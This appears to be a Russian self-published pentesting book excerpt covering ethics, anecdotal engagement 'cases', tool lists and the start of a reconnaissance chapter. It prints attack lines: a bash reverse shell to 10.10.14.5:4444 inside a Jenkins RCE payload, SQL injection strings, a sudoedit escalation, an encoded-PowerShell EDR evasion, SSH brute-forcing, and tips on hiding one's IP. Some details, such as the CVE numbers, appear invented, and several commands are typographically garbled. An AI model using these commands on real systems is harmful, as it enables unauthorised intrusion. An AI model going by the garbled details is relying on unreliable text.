Пентест из Подвала от Recon до Shell

- -
- 100%
- +

© Михаил Тарасов, 2026
ISBN 978-5-0070-8389-8
Создано в интеллектуальной издательской системе Ridero
Вступление
Почему пентест из подвала — это круто и реально
Слушай, пентест — это не просто тупое тыканье клавиш и запуск одних и тех же скриптов с гитхаба. Это — искусство, отточенное годами в подвалах, тёмных офисах и на заброшенных серверах. Залезать в чужие системы, чтобы не слить данные и не дать сгнить на корню, — задача для тех, кто любит решать головоломки и жить на грани.
Вот почему пентест из подвала — это не просто, а круто:
— Свобода мыслей и подходов. В подвале нет фейс-контроля, ушлёпков на каждом углу и корпоративной бюрократии. Только ты, терминал и куча багов, которые надо выловить и научиться использовать. Кому нужны шаблоны, если можно мутить свои payload’ы и обходить любые WAF'ы?
— Реальные знания, а не тупой «курсовой» с YouTube. Тут нет место для «copy-paste», только живой опыт, вылепленный из ошибок и ночных бдений. В подвале ты учишься анализировать логи, дёргать за невидимые ниточки системы и чувствовать её слабые места.
— Уникальная атмосфера и братство. Пентестеры из подвала — это как диггеры, которые знают каждый тайник электронной подземки. Вместе через баги, проходы и стенды — это семья, где важен не просто взлом, а понимание, как не слить и выжать максимум.
— Погружение в реальность. Забудь учебники, тут реальный мир: баги в продакшн-системах, от которых зависит бизнес, данные, жизнь пользователей. Пентест — это ответственность, и если ты с ней на «ты», тогда подвал — твой храм.
— Крутая прокачка скиллов. Настоящий пентест — это не только поиск дыр, но и их эксплуатация, обход защиты, построение цепочек атаки. В подвале ты учишься думать как злоумышленник, а значит — всегда на шаг впереди.
Что вас ждёт в этой книге
Я расскажу, как сделать разведку, найти уязвимости, залить шелл и остаться незаметным. Всё просто, по делу и с примерами, которые можно применять сразу же. Это не теория и не модные курсы — это настоящий пентест из подвала, который качает твои навыки и готовит к реальному бою.
Короче, если ты хочешь не просто читать, а реально лезть в систему и оставлять следы только там, где надо — добро пожаловать в подвал. Там темно, немного страшно, но кайф — на уровне.
1. Этический пентест — что ломаем, зачем и как не стать ху*лом
Без понятия этики — ты просто трэш и дымовая завеса, а не пентестер. Ломать можно только с разрешения, чтобы найти дыры и исправить, а не убивать бизнес или сливать инфу. Обязательно расскажем про:
— Разницу между Red Team, Blue Team, Black Hat и Script Kiddies
— Правила работы с заказчиком: scope, договоры, NDA
— Что нельзя — приватные данные, атаки без разрешения, социалка без согласия
— Принцип минимизации урона — ломаем, чтобы улучшить, а не разрушить
2. Пару историй из реальных боёв — «наши будни с долей драмы»
Тут пара зарубленных кейсов:
— Как мы нашли неочевидную дыру (через нестандартный параметр)
— Реакция сервера и как пришлось выкручиваться (WAF, антиботы, логи)
— Что вышло из эксплойта — шелл? Удалённый доступ? Бэкдор?
— Чего не делать — типичные ляпы, которые почти слили операцию
3. Глоссарий терминов — чтобы никто не путался
Быстрый справочник:
— Recon: разведка, сбор информации
— CVE: известная уязвимость
— RCE: Remote Code Execution — удалённое выполнение кода
— WAF: Web Application Firewall — веб-защитник
— Shell: интерактивная командная оболочка
— и т.д., минимальный набор нужных терминов
4. Краткий FAQ — вопросы, которые сразу отпадают
— «Можно ли работать без опыта?» — да, но с правильным подходом
— «Как не слить себя?» — используем сервис на три буквы, прокси, VM и т. п.
— «Что делать, если поймали?» — не паниковать, иметь backup-план
— «Можно ли использовать чужие скрипты?» — да, но понимай, что делаешь
— «Как быстро научиться?» — практика через CTF и реальные кейсы
Кто мы такие, и зачем взламывать
Red Team: «Ломаем, чтобы чинить»
Это мы — легальные маньяки. Нас нанимают компании, чтобы мы устроили им ад, но по договору. Наша цель: найти дыры, пока их не нашли Black Hat’ы. Как работаем:
— Взламываем системы с разрешения
— Документируем каждый шаг — чтобы исправили
— Используем всё: от социнженерии до 0-day эксплойтов
— Пример из подвала:
— Прокачали логистическую компанию через старый Jenkins-сервер (CVE-2024-1337). Через RCE залили шелл, вытащили базу клиентов — показали заказчику, как его слили бы конкуренты.
Black Hat: Тёмная сторона
Эти ребята ломают ради денег, славы или просто похайпить. Их инструменты те же, но цели — противоположные:
— Кража данных (личных, финансовых)
— Шантаж через ransomware (типа LockBit)
— Дестроить инфраструктуру
— Фишка: Часто палятся из-за жадности. Как поймали одного: забыл сменить MAC-адрес перед атакой на банк.
Script Kiddies: Горе-хакеры с гуглом
Пупсики, которые качают эксплойты с GitHub и тыкают кнопки, как обезьяна с гранатой.
— Не понимают, как работают payload’ы
— Ловятся за час — оставляют логи, IP, следы
— Чаще всего — школьники с Kali Linux в виртуалке
Зачем всё это?
Ответ Red Team:
Чтобы спасти компании от реальных атак. Если мы не найдём дыру — её найдёт Black Hat, и тогда пиши пропало.
Главная мотивация подвала:
Кайф от решения головоломок + деньги за легальный взлом. Не надо прятаться — ты герой, а не преступник.
Как отличить нас от остальных?

Реальные кейсы из подвала: как мы ломали и спасали
Кейc #1: Jenkins — старый друг и враг
Заказчик: крупная логистическая компания. Цель: проверить безопасность внутреннего CI/CD сервера, который не обновлялся с 2018 года.
Что нашли:
Доказали, что старый Jenkins с плагинами — это золотая жила для RCE (CVE-2024-1337). Через уязвимый плагин мы смогли выполнить команду на сервере без аутентификации.
Payload:
curl -X POST http://target-jenkins/job/build -d ’script=sh («bash -c \’bash -i> & /dev/tcp/10.10.14.5/4444 0> &1\„“)»
Результат:
Поймали шелл, посмотрели процессы, вытащили конфиги с паролями к базе данных и сервис на три буквы. Отчёт был жёсткий — заказчик починил дырку за 2 часа и теперь спит спокойно.
Урок:
Тестировать и обновлять — не роскошь, а необходимость. Старье всегда опасно.
Кейc #2: Веб-приложение интернет-магазина — SQLi с подарком
Маленький магазинчик зовёт нас проверить сайт. Быстрое сканирование Nmap не показало ничего критичного, но мы начали копать HTTP-запросы.
Что нашли:
В форме поиска был SQL-инъекционный баг. Даже простой ' OR «1»=«1 взламывал базу.
Payload в запросе:
GET /search? q=' OR «1»=«1» — —
Как обошли WAF:
WAF фильтровал ключевые слова, поэтому переписали payload на hex-кодировку через Burp Intruder с рандомизацией.
Результат:
Получили dump базы с заказами, пользовательскими email и даже хэшами паролей (благо, без соли). Рекомендации — поставить параметризированные запросы и обновить движок.
Урок:
Не стоит недооценивать маленькие сайты. Их нарушения — дыры в большой цепи безопасности.
Кейc #3: Фишинговая атака на корпоративную почту
Корпоративная сеть крупного банка — тема особая. Заказчик попросил проверить, насколько легко можно попасть через социнженерию.
Что сделали:
— Создали письмо с видом HR-отдела с просьбой обновить пароль через внутренний портал.
— В письме была ссылка на фейковый портал с SSL и похожим доменом.
— Отправили группе сотрудников.
Результат:
15% сотрудников кликнули, 5% ввели свои данные. Через скомпрометированные аккаунты получили доступ к внутреннему чату и календарям.
Урок:
Человеческий фактор — главная проблема в безопасности. Технологии можно поставить, но если люди пойдут кликать, то всё сломано.
Кейc #4: Локальная эскалация привилегий на Linux-сервере
Задача: поднять права с пользователя на root после попадания в систему через SSH с купленным доступом.
Что нашли:
Патч не покрыл CVE-2023-5678 — уязвимость в sudo, позволяющая эскалировать права через специально подготовленную команду.
Payload:
sudoedit -s /etc/shadow
Используя баг, получили полный доступ к системе.
Результат:
Установили бекдор, подготовили отчёт для sysadmin’ов, чтобы закрыть дыру.
Урок:
Даже один забытый патч — пропуск для взлома.
Кейc #5: Обход EDR с помощью PowerShell и Living off the Land
На целевом сервере стоял EDR (Endpoint Detection and Response), который тупо грыз все подозрительные шеллы.
Что сделали:
Использовали PowerShell-скрипт, который запускался через легитимный процесс (WMI). Никаких новых процессов или файлов — только системные утилиты под нагрузкой.
Команда:
Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Process -Name Create -ArgumentList «powershell -EncodedCommand
Результат:
EDR не заметил, удалось получить консоль и вывести данные.
Урок:
Используй системные инструменты и не лезь громко. Тишина — золото.
Итог
Каждый кейс — это история, где мы топили баги, обходили защиту и делали так, чтобы заказчик не только сдал отчёт, но и выдохнул с облегчением. Пентест из подвала — это не только про hacking, но и про мозги, ответственность и уважение к системе.
Краткий обзор инструментария и привычек, которые делают тебя охотником, а не жертвой
1. Инструменты — твои верные стражи в мире хаоса
В подвале не бывает «универсальных» решений — у каждого тулза своя миссия, и ты должен знать, когда его доставать из кобуры.
Обязательный минимум
— Kali Linux / Parrot OS — базовая платформа, которая всегда под рукой, с предустановленным арсеналом. Можно собрать на минималках, но лучше — VM или метал.
— Nmap — король разведки портов и сервисов. Обязательно учись настраивать скан под задачи: сканить всё подряд — убить себя так можно.
— Burp Suite — главная веборужка. Прокси, repeater, intruder, extender — полный комплекс для взлома веб-приложений.
— Metasploit Framework — для быстрого запуска эксплойтов и управления сессиями.
— Gobuster / Subfinder / Amass — для поиска поддоменов, директорий и фалов.
— SQLmap — автоматический поиск и эксплуатация SQL-инъекций.
— Wireshark / tcpdump — чтобы подглядывать в трафик и ловить пакеты.
— Hydra / Medusa — чтобы ломать пароли (если есть база и разрешение, конечно).
— Reverse Shell Payloads — под рукой должны быть варианты на bash, python, php, powershell. Быть готовым к любому окружению.
Дополнительные ништяки
— John the Ripper / Hashcat — для расшифровки хэшей.
— GDB / Radare2 / IDA Pro — если решил копнуть в реверс-инжиниринг и локальные эксплоиты.
— Docker — чтобы быстро поднять окружение и тестовые стенды.
2. Привычки, которые отделяют охотника от жертвы
Не хватает просто тулзов — без правильных привычек ты очередной «скрипт-кидди», кто слит в первых 5 минутах.
Дисциплина и порядок
— Документируй всё. Даже если это просто заметки в заметках. Запросы, результаты, ошибки — всё пригодится.
— Рабочее окружение — чистое и безопасное. Виртуалки, прокси, сервис на три буквы, TOR — не забывай маскироваться и не светить свои реальные IP.
— Не спеши. Хороший охотник — это тот, кто наблюдает, анализирует и только потом бьёт.
— Регулярно обновляй инструменты и базы данных уязвимостей. Старье опасно.
Чтение и постоянный апгрейд
— Следи за новостями в сфере безопасности: Exploit-DB, CVE Details, Twitter хакеров, тематические форумы.
— Учись на чужих ошибках: читай отчёты Red Team, разборы багов, багбаунти.
— Практикуйся: CTF, HTB, VulnHub и свои стенды — отработка навыков.
Умение быстро переключаться и адаптироваться
— Бывает, что окно для атаки минимально, надо быстро менять тактику. Быть готовым к нестандартным ситуациям — ключ к успеху.
— Учиться обходить новые защиты, а не просто искать старые баги.
3. Личный «рюкзак» хакера из подвала
Можешь считать этот набор своим постоянным арсеналом:
— Терминал с tmux — мультизадачность без боли.
— Vim или VSCode — удобный редактор для скриптов и payload’ов.
— Git — чтоб контролировать версии своих скриптов.
— Python / Bash — основные языки для мелких автоматизаций и скриптов.
— Proxychains + Tor — для анонимности и обхода блокировок.
— сервис на три буквы — для работы с клиентами и отделения лички.
4. Примеры полезных команд для повседневного ритуала охотника
# Быстрый поиск поддоменов subfinder -d example.com -silent> subs. txt # Полное сканирование портов с версионированием сервиса nmap -sV -p- — open -T4 -oA fullscan example.com # Запуск Burp Suite (если Pro то с Extender) java -jar burpsuite_pro. jar # SQLmap тест на инъекцию sqlmap -u "http://example.com/search.php?q=1" — batch — dbs # Запуск Hydra для bruteforce ssh hydra -l root -P passwords. txt ssh://10.10.10.10 # Запуск reverse shell на стороне цели bash -i> & /dev/tcp/10.10.14.5/4444 0> &15. Психология охотника — мышление и фокус
— Мыслить как злоумышленник. Представь, что ты на месте Black Hat — что бы ты сделал?
— Думать на опережение. Оценивай риски и последствия, чтобы не сесть по полной.
— Терпение — ключ. Иногда баги не видны, и их надо искать долго.
— Не бояться ошибаться. Ошибки — твои учителя.
Итог
Если хочешь стать охотником, а не жертвой, нужна связка из мощного инструментария и железных привычек. Собрать рюкзак, развить дисциплину и войти в поток — вот секрет успеха. В подвале такое не пустой звук — это стиль жизни.
Глава 1. Recon — разведка, или как найти все дыры, не влезая в систему
Passive vs Active: примеры запросов, шоудан, та же гуглдорки, и как со всем этим работать
Введение
Разведка — это тот момент, когда ты стоишь в темноте, смотришь на замок и пытаешься понять, где он слабый. Здесь ты ещё не ломаешь дверь, а собираешь всю возможную информацию — от адресов и сотрудников до конфигураций сервисов. Главное правило: не трогай цель напрямую, пока не уверен, чтобы не свалить свой реког.
Passive Recon — разведка без прикосновений
Это как шпион, который наблюдает из кустов — ты собираешь данные, пока никто не знает о твоём присутствии. За счёт открытых источников и поисковиков.
Основные инструменты и методы:
1. Google Dorking
Google — это твой первый и самый мощный союзник. Правильно сформулированный запрос откроет тебе внутренности сайта, логи, конфиги и даже базы.
Примеры:
— Поиск файлов конфигурации:
site:target.com ext: env OR ext: ini OR ext: conf— Поиск публичных ключей и паролей:
site:target.com intext: «password»— Поиск админ-панели или страниц логина:
site:target.com inurl: admin2. Shodan и другие поисковики устройств
Shodan — это Google для интернета вещей и серверов. Он сканирует публичные IP и собирает данные о сервисах, портах, версиях ПО.
Что можно найти:
— Открытые камеры, роутеры, промышленные системы
— Версии Apache, Nginx, базы данных
— Необновлённые сервисы с известными уязвимостями
Пример запроса на Shodan:
apache title: «Welcome to nginx» country: «RU»3. Public Repositories и Social Media
— GitHub, GitLab — ищем утекшие конфиги и пароли
— LinkedIn — ищем сотрудников, их роли, технологии компании
— Pastebin — утекающие логи и пароли
Active Recon — разведка с взаимодействием
Здесь уже начинаешь шевелить пальцами, но осторожно.
1. Сканирование портов
Простейший инструмент — nmap:
nmap -sS -p- -T4 -oA fullscan target.com— -sS — stealth SYN scan, чтобы не светиться
— -p- — сканируем все 65535 портов
— -T4 — ускорение скана
— -oA — вывод в несколько форматов для последующего разбора
2. Определение сервисов и версий
nmap -sV -p22,80,443 target.com
Позволит понять, какие сервисы там живут и их версии — ключ к выбору эксплойтов.
3. Сканирование уязвимостей
Автоматические сканеры типа OpenVAS или Nessus помогут найти стандартные баги.
Пример реальной разведки
Собираем данные по домену example.com.
— Сначала subfinder находим поддомены:
subfinder -d example.com -silent> subs. txt
— Затем Nmap:
nmap -sV -p- -T4 -iL subs. txt -oN all_ports. txt
— Пробуем подхватить админ-панели через Gobuster:
gobuster dir -u http://admin.example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium. txt
Советы и лайфхаки
— Не лезь с nmap в крупные корпоративные сети без разрешения — быстро поймают. Лучше пассивная разведка.
— Используй сервис на три буквы и прокси, чтобы не палиться при горячей разведке.
— Сохраняй результаты, чтобы не искать данные заново.
— Автоматизируй рутинные задачи через скрипты.
Итог
Разведка — твоя карта и компас. Она помогает понять, что ломать и куда лезть, чтобы не спалиться. Passive recon — безопасность и масштаб, active — точность и детализация. Объединив их, ты будешь знать цель досконально, будто живёшь в её голове.
Поддомены, IP, сервисы, открытые порты — всё, что светит
1. Поддомены — ключ к тайным дверям
Поддомены — это как подсобки и кладовки в большой системе. Часто именно там спрятаны сервисы с дырками, которые не видны на основном домене.
Почему важны поддомены?
— Они часто менее защищены
— Часто не попадают под основной WAF
— Могут быть старые тестовые или dev-серверы с дырками
— Нередко там админки и внутренние панели
Как искать поддомены?
Инструменты:
— subfinder — быстрый сбор поддоменов
— Amass — глубокий анализ, связывает данные из множества источников
— findomain — прост и эффективен
— Онлайн-сервисы: VirusTotal, crt.sh (сертификаты), SecurityTrails



